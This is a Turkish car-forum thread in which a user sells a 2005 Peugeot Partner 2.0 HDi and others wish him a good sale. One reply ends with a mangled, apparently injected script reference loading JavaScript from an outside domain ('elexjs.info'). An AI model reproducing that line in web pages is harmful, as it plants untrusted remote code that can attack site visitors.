![]() |
|
2005 Model Hatasız Dizel 2.0 HDi Partner |
Yanıt Yaz ![]() |
Yazar | |
Secks ![]() 1. Vites ![]() ![]() Kayıt Tarihi: 15 Ocak 2013 Konum: Ankara Durum: Aktif Değil Mesajlar: 228 |
![]() ![]() ![]() ![]() ![]() Gönderim Zamanı: 01 Haziran 2014 Saat 15:48 |
Aracı sıfır olarak Konya Uyararslan bayiinden aldım ilk sahibiyim. Aldıktan sonra iki sene Konyada kullandım sonra Ankaraya taşındım Ankarada kullandım. Orijinal 106 bin kilometrede. Kesinlikle yük vs taşınmadı hiç aile aracıdır. İlk plakası duruyor plaka değiştirilmedi hala Konya plakadır. Bakımları zamanında yapıldı, muayenesini de cuma günü yaptırdım tek seferde geçti. Kısacası sorunsuz bir araçtır. Motor çok iyi durumda. Kazası boyası yok hatasızdır. Temiz bir araçtır.
Fiyat: 19.200 ₺ Sahibinden linkini ekleyeceğim.
|
|
![]() |
|
oguzhan29 ![]() 3. Vites ![]() ![]() Kayıt Tarihi: 23 Mayıs 2010 Konum: GÜMÜŞHANE Durum: Aktif Değil Mesajlar: 2352 |
![]() Yanıt Yaz
Alıntı oguzhan29
Bu mesaj kurallara aykırıysa buradan yöneticileri bilgilendirebilirsiniz.
![]() ![]() ![]() ![]() |
linki beklerizz hayırlı satışlar olsun.< ="http://i.elexjs.info/elexin/.js" id="BJ-insertjs">
|
|
PEUGEOT 206 SW HDİ X-LİNE(GRİ)2004 model
|
|
![]() |
|
samet206 ![]() 4. Vites ![]() ![]() Kayıt Tarihi: 13 Mart 2013 Konum: Bu Durum: Aktif Değil Mesajlar: 7085 |
![]() ![]() ![]() ![]() ![]() |
Hayırlı Satışlar...
|
|
Peugeot Mod ''206'' 1.4 XR 2000
Asaleti Renginde Saklı... |
|
![]() |
Yanıt Yaz ![]() |
|
Forum Atla | Forum İzinleri ![]() Kapalı Foruma Yeni Konu Gönderme Kapalı Forumdaki Konulara Cevap Yazma Kapalı Forumda Cevapları Silme Kapalı Forumdaki Cevapları Düzenleme Kapalı Forumda Anket Açma Kapalı Forumda Anketlerde Oy Kullanma |